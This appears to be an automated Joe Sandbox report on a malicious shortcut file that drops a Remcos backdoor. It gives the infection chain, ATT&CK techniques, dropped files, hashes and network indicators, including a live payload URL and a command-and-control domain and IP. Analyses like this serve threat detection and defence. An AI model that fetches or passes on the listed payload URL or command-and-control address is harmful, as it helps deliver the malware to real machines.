                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
                      311
                      Process Injection
                      131
                      Masquerading
                      1
                      Input Capture
                      2
                      System Time Discovery
                      Remote Services1
                      Input Capture
                      1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts2
                      Native API
                      2
                      Registry Run Keys / Startup Folder
                      1
                      Scheduled Task/Job
                      31
                      Virtualization/Sandbox Evasion
                      LSASS Memory221
                      Security Software Discovery
                      Remote Desktop Protocol11
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      PowerShell
                      11
                      DLL Side-Loading
                      1
                      Abuse Elevation Control Mechanism
                      311
                      Process Injection
                      Security Account Manager11
                      Process Discovery
                      SMB/Windows Admin SharesData from Network Shared Drive2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                      Registry Run Keys / Startup Folder
                      1
                      Deobfuscate/Decode Files or Information
                      NTDS31
                      Virtualization/Sandbox Evasion
                      Distributed Component Object ModelInput Capture112
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
                      DLL Side-Loading
                      1
                      Abuse Elevation Control Mechanism
                      LSA Secrets11
                      Application Window Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                      Obfuscated Files or Information
                      Cached Domain Credentials3
                      File and Directory Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                      DLL Side-Loading
                      DCSync144
                      System Information Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1518485 Sample: MdkbG2pK4l.lnk Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 82 lawyerconsult.top 2->82 84 171.39.242.20.in-addr.arpa 2->84 90 Found malware configuration 2->90 92 Malicious sample detected (through community Yara rule) 2->92 94 Antivirus detection for dropped file 2->94 96 10 other signatures 2->96 11 cmd.exe 1 2->11         started        14 DZIPR.exe 1 2->14         started        16 DZIPR.exe 1 2->16         started        18 2 other processes 2->18 signatures3 process4 dnsIp5 128 Windows shortcut file (LNK) starts blacklisted processes 11->128 21 hello.exe 6 11->21         started        25 powershell.exe 14 16 11->25         started        28 conhost.exe 1 11->28         started        130 Maps a DLL or memory area into another process 14->130 132 Found direct / indirect Syscall (likely to bypass EDR) 14->132 30 cmd.exe 2 14->30         started        32 cmd.exe 2 16->32         started        86 127.0.0.1 unknown unknown 18->86 34 cmd.exe 2 18->34         started        signatures6 process7 dnsIp8 68 C:\Users\user\DZIPR.exe, PE32 21->68 dropped 70 C:\Users\user\DZIPR.dll, PE32 21->70 dropped 110 Drops PE files to the user root directory 21->110 36 DZIPR.exe 5 21->36         started        88 lawyerconsult.top 172.94.3.25, 49699, 80 VOXILITYGB United States 25->88 72 C:\Users\user\AppData\Roaming\hello.exe, PE32 25->72 dropped 112 Powershell drops PE file 25->112 74 C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, PE32 30->74 dropped 114 Injects code into the Windows Explorer (explorer.exe) 30->114 116 Writes to foreign memory regions 30->116 118 Maps a DLL or memory area into another process 30->118 40 conhost.exe 30->40         started        42 explorer.exe 30->42         started        76 C:\Users\user\AppData\Local\Temp\lejp, PE32 32->76 dropped 44 conhost.exe 32->44         started        46 explorer.exe 32->46         started        78 C:\Users\user\AppData\Local\Temp\rjhlrgwt, PE32 34->78 dropped 48 conhost.exe 34->48         started        50 explorer.exe 34->50         started        file9 signatures10 process11 file12 64 C:\Users\user\AppData\Roaming\...\DZIPR.exe, PE32 36->64 dropped 66 C:\Users\user\AppData\Roaming\...\DZIPR.dll, PE32 36->66 dropped 106 Switches to a custom stack to bypass stack traces 36->106 108 Found direct / indirect Syscall (likely to bypass EDR) 36->108 52 DZIPR.exe 1 36->52         started        signatures13 process14 signatures15 98 Windows shortcut file (LNK) starts blacklisted processes 52->98 100 Maps a DLL or memory area into another process 52->100 102 Switches to a custom stack to bypass stack traces 52->102 104 Found direct / indirect Syscall (likely to bypass EDR) 52->104 55 cmd.exe 5 52->55         started        process16 file17 80 C:\Users\user\AppData\Local\Temp\paogviura, PE32 55->80 dropped 120 Injects code into the Windows Explorer (explorer.exe) 55->120 122 Writes to foreign memory regions 55->122 124 Found hidden mapped module (file has been removed from disk) 55->124 126 Switches to a custom stack to bypass stack traces 55->126 59 explorer.exe 55->59         started        62 conhost.exe 55->62         started        signatures18 process19 signatures20 134 Switches to a custom stack to bypass stack traces 59->134

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      MdkbG2pK4l.lnk8%ReversingLabs
                      MdkbG2pK4l.lnk100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\lejp100%AviraBDS/Backdoor.Gen
                      C:\Users\user\AppData\Local\Temp\gnqpmvvlbu100%AviraBDS/Backdoor.Gen
                      C:\Users\user\AppData\Local\Temp\paogviura100%AviraBDS/Backdoor.Gen
                      C:\Users\user\AppData\Local\Temp\rjhlrgwt100%AviraBDS/Backdoor.Gen
                      C:\Users\user\AppData\Local\Temp\lejp100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\gnqpmvvlbu100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\paogviura100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\rjhlrgwt100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\gnqpmvvlbu87%ReversingLabsWin32.Backdoor.Remcos
                      C:\Users\user\AppData\Local\Temp\lejp87%ReversingLabsWin32.Backdoor.Remcos
                      C:\Users\user\AppData\Local\Temp\paogviura87%ReversingLabsWin32.Backdoor.Remcos
                      C:\Users\user\AppData\Local\Temp\rjhlrgwt87%ReversingLabsWin32.Backdoor.Remcos
                      C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.dll0%ReversingLabs
                      C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe0%ReversingLabs
                      C:\Users\user\AppData\Roaming\hello.exe3%ReversingLabs
                      C:\Users\user\DZIPR.dll0%ReversingLabs
                      C:\Users\user\DZIPR.exe0%ReversingLabs
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://www.symauth.com/cps0(0%URL Reputationsafe
                      fullimmersion777.com0%Avira URL Cloudsafe
                      https://www.digicert.c0%Avira URL Cloudsafe
                      http://www.vmware.com/0/0%Avira URL Cloudsafe
                      https://www.datanumen.com/zip-repair/0%Avira URL Cloudsafe
                      http://lawyerconsult.top/AUGUST.exe0%Avira URL Cloudsafe
                      http://www.vmware.com/00%Avira URL Cloudsafe
                      http://www.symauth.com/rpa000%Avira URL Cloudsafe
                      https://www.datanumen.com/zip-repair-order/2https://www.datanumen.com/socialmedia/facebook.htm0%Avira URL Cloudsafe
                      http://www.info-zip.org/0%Avira URL Cloudsafe
                      https://g.live.com/odclientsettings/Prod1C:0%Avira URL Cloudsafe
                      https://g.live.com/odclientsettings/ProdV21C:0%Avira URL Cloudsafe
                      https://www.datanumen.com/contact/0https://www.datanumen.com/update/dzipr/dzipr.inf0%Avira URL Cloudsafe
                      http://www.repairfile.com0%Avira URL Cloudsafe
                      http://c0rl.m%L0%Avira URL Cloudsafe
                      https://www.datanumen.com/%https://www.datanumen.com/zip-repair/0%Avira URL Cloudsafe
                      http://support.datanumen.com0%Avira URL Cloudsafe
                      https://www.datanumen.com/support/0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      lawyerconsult.top
                      172.94.3.25
                      truetrue
                        unknown
                        171.39.242.20.in-addr.arpa
                        unknown
                        unknowntrue
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          http://lawyerconsult.top/AUGUST.exetrue
                          • Avira URL Cloud: safe
                          unknown
                          fullimmersion777.comtrue
                          • Avira URL Cloud: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://g.live.com/odclientsettings/Prod1C:edb.log.18.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.digicert.cDZIPR.exe, 0000000C.00000002.1398188269.000000000343A000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.vmware.com/0DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.datanumen.com/zip-repair/hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.symauth.com/rpa00DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1398188269.000000000343A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.datanumen.com/zip-repair-order/2https://www.datanumen.com/socialmedia/facebook.htmDZIPR.exe.12.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.info-zip.org/DZIPR.exe, 0000000C.00000002.1398577312.000000000353D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.0000000005524000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F1C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A19000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.0000000005225000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.000000000514A000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.000000000552B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046B6000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.vmware.com/0/DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000012.00000003.1494645538.00000174C5570000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.datanumen.com/contact/0https://www.datanumen.com/update/dzipr/dzipr.infDZIPR.exe.12.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://c0rl.m%LDZIPR.exe, 0000000C.00000002.1398188269.000000000343A000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.repairfile.comDZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.symauth.com/cps0(DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://support.datanumen.comDZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.datanumen.com/%https://www.datanumen.com/zip-repair/DZIPR.exe.12.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.datanumen.com/support/DZIPR.exe.12.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          172.94.3.25
                          lawyerconsult.topUnited States
                          3223VOXILITYGBtrue
                          IP
                          127.0.0.1
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1518485
                          Start date and time:2024-09-25 18:32:55 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 9m 1s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:35
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:MdkbG2pK4l.lnk
                          renamed because original name is a hash value
                          Original Sample Name:9ee2b12e8974f00111bb9887f7f9e19f.lnk
                          Detection:MAL
                          Classification:mal100.troj.expl.evad.winLNK@34/27@2/2
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 99%
                          • Number of executed functions: 69
                          • Number of non-executed functions: 237
                          Cookbook Comments:
                          • Found application associated with file extension: .lnk
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: MdkbG2pK4l.lnk
                          TimeTypeDescription
                          12:33:50API Interceptor45x Sleep call for process: powershell.exe modified
                          14:11:31API Interceptor2x Sleep call for process: svchost.exe modified
                          14:11:41API Interceptor8x Sleep call for process: cmd.exe modified
                          14:12:04API Interceptor1x Sleep call for process: explorer.exe modified
                          20:11:36AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BITE1BA.tmp
                          20:11:39Task SchedulerRun new task: lnfast_x64 path: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                          20:11:50AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oracledemo_dbg.lnk
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          172.94.3.2555Ka50lb6Z.batGet hashmaliciousRemcosBrowse
                          • 172.94.3.25/AUGUST.exe
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          VOXILITYGB55Ka50lb6Z.batGet hashmaliciousRemcosBrowse
                          • 172.94.3.25
                          zz91Dcv5Kf.dllGet hashmaliciousRemcosBrowse
                          • 172.94.9.207
                          V9HUU0LCin.dllGet hashmaliciousRemcosBrowse
                          • 172.94.9.207
                          E5r67vtBtc6.exeGet hashmaliciousXmrigBrowse
                          • 172.94.15.211
                          Miner-XMR2.exeGet hashmaliciousXmrigBrowse
                          • 172.94.15.211
                          af0b876a436452a6e998fc622493aaa4553bcc53864d66a6a6d5d476a85902eb_dump1.exeGet hashmaliciousNanocore, RemcosBrowse
                          • 104.243.242.162
                          zczsJahg5p.exeGet hashmaliciousNanocore, Remcos, PureLog StealerBrowse
                          • 104.243.242.164
                          SLL8zVmaGj.elfGet hashmaliciousUnknownBrowse
                          • 185.247.61.190
                          tfEceyjWwA.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                          • 104.243.242.171
                          UlKVk4jZsk.exeGet hashmaliciousPureLog StealerBrowse
                          • 104.243.242.162
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          C:\Users\user\AppData\Local\Temp\paogviuraepht1Y3TGZ.exeGet hashmaliciousRemcosBrowse
                            55Ka50lb6Z.batGet hashmaliciousRemcosBrowse
                              C:\Users\user\AppData\Local\Temp\gnqpmvvlbuepht1Y3TGZ.exeGet hashmaliciousRemcosBrowse
                                55Ka50lb6Z.batGet hashmaliciousRemcosBrowse
                                  C:\Users\user\AppData\Local\Temp\lejpepht1Y3TGZ.exeGet hashmaliciousRemcosBrowse
                                    55Ka50lb6Z.batGet hashmaliciousRemcosBrowse
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):1310720
                                      Entropy (8bit):0.7326883089912865
                                      Encrypted:false
                                      SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vq6:2JIB/wUKUKQncEmYRTwh0a
                                      MD5:B1F13A8EAF6BE6F03654DB76A9710DBF
                                      SHA1:AAE6675DE8A3789FCBD153CE15B637DD4CEF596B
                                      SHA-256:54595DF67709C099469CE2E25E6B2BEA8F9128BB1A8E2FBAF864E0C193A51F9F
                                      SHA-512:0A8ECD03F2C8C99D6338415BCC36A191E5452E81570A9BBF0243ED3BFB278559DC80924B1971D460BA8A02AA17E7CFC927302B46F2E4731C6C4095196F41E58C
                                      Malicious:false
                                      Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0bed3222, page size 16384, DirtyShutdown, Windows version 10.0
                                      Category:dropped
                                      Size (bytes):1310720
                                      Entropy (8bit):0.7899806607291557
                                      Encrypted:false
                                      SSDEEP:1536:LSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:LazaPvgurTd42UgSii
                                      MD5:571F8D63131505D8FE5CA1507A31490D
                                      SHA1:E93D77A28D92CEEDAF384C4D4B6D660CED90F799
                                      SHA-256:0BA98F6B323C49982B5AC577EFBAFEFDBC23AAC57189CA43BC19769097C5095D
                                      SHA-512:1578106B794B514F92974A3C43D573F042861DFA3B798E186145505DF09F86DAF1229CECF402011F01A034A621CCF65C0424B1633FDAB2CC0F7933B03372E343
                                      Malicious:false
                                      Preview:..2"... ...............X\...;...{......................0.`.....42...{5......|..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{..................................e..M.....|..................A..}.....|...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):16384
                                      Entropy (8bit):0.08098116476071052
                                      Encrypted:false
                                      SSDEEP:3:t/KYeNx4fg1t/57Dek3JDtI7OAllEqW3l/TjzzQ/t:1KzNxOgHR3txIaAmd8/
                                      MD5:6DC5975EB1913EE9C888DA158D206276
                                      SHA1:BC9FB85E2B60E4B272041DEFAD07718CCF5D53A0
                                      SHA-256:B1DE926B1389EC39C394D35D6F6C0BE2C1B3E6523A02803B11E5FD5CEBAD9D5F
                                      SHA-512:35C90099799760A609A35084C2A1BE0B84A414914E1FDA4F8CAE6F306B753E705D4F2CA72E88487399EDB49EEDDD29753C1C6A5959E6DD0E67AC40DA61B1840E
                                      Malicious:false
                                      Preview:+........................................;...{.......|..42...{5.........42...{5.42...{5...Y.42...{59................A..}.....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):1.1940658735648508
                                      Encrypted:false
                                      SSDEEP:3:Nlllultnxj:NllU
                                      MD5:F93358E626551B46E6ED5A0A9D29BD51
                                      SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                      SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                      SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                      Malicious:false
                                      Preview:@...e................................................@..........
                                      Process:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                                      File Type:data
                                      Category:modified
                                      Size (bytes):1234044
                                      Entropy (8bit):7.626167332636038
                                      Encrypted:false
                                      SSDEEP:24576:oNyjiDKtPtRGaoxz+LtafJwPxWE9rupTi1pHxLUlitmuUkdUC+7m4/nz9qVv9Pye:J/twxKL8AvcTifHxftmul4m4/nzUN9ae
                                      MD5:DC17A490C8D1ABD780EDB011952FFC38
                                      SHA1:938C15001B096BFB72633861FDAAAF6DF53C084D
                                      SHA-256:9CB638622822CB1B95369704623C12D215170E14CC13168672CE9E97098C66CF
                                      SHA-512:A3CE1FE80D8FDC4BD6F03E4CF594FAFA803A4FD48E592884A41B18D1DE5F665C79DB285477AD12FA4AE9D5AEFA8610D2F4FF34FE281B5C0615DED2F0E6AE1DBB
                                      Malicious:false
                                      Preview:s.5q.5q.5p.5q.54.5d.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5U..e4..tU..\...F...i'..Q...i#..G...P...e...G...i#..G...5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.53..[...T...P5..5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.53..G...P9..A...Pp.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5U..{4...,..V...Z...{5..s...P...^p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5...^..B.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5
                                      Process:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                                      File Type:data
                                      Category:modified
                                      Size (bytes):1234044
                                      Entropy (8bit):7.6261685464265785
                                      Encrypted:false
                                      SSDEEP:24576:PNyjiDKtPtRGaoxz+LtafJwPxWE9rupTi1pHxLUlitmuUkdUC+7m4/nz9qVv9Pye:A/twxKL8AvcTifHxftmul4m4/nzUN9ae
                                      MD5:728E69D6EAC04926643AA1E73F9D2282
                                      SHA1:8FD0099F95B08059AA417B8CDBD403C586A83214
                                      SHA-256:1B90DF8D05E3AF6291F043664E9C071DD4726F9DFD4E91E06A683A3A5337BFF2
                                      SHA-512:F430DA71266C96C454EADE682D3CDCD1816EC4CEB3C57D776EA97C17FC37FBB02EE32F59F153C8A69A194BD3C087023CAD37C7EF083E822B5FA4DF44C9C3F6F3
                                      Malicious:false
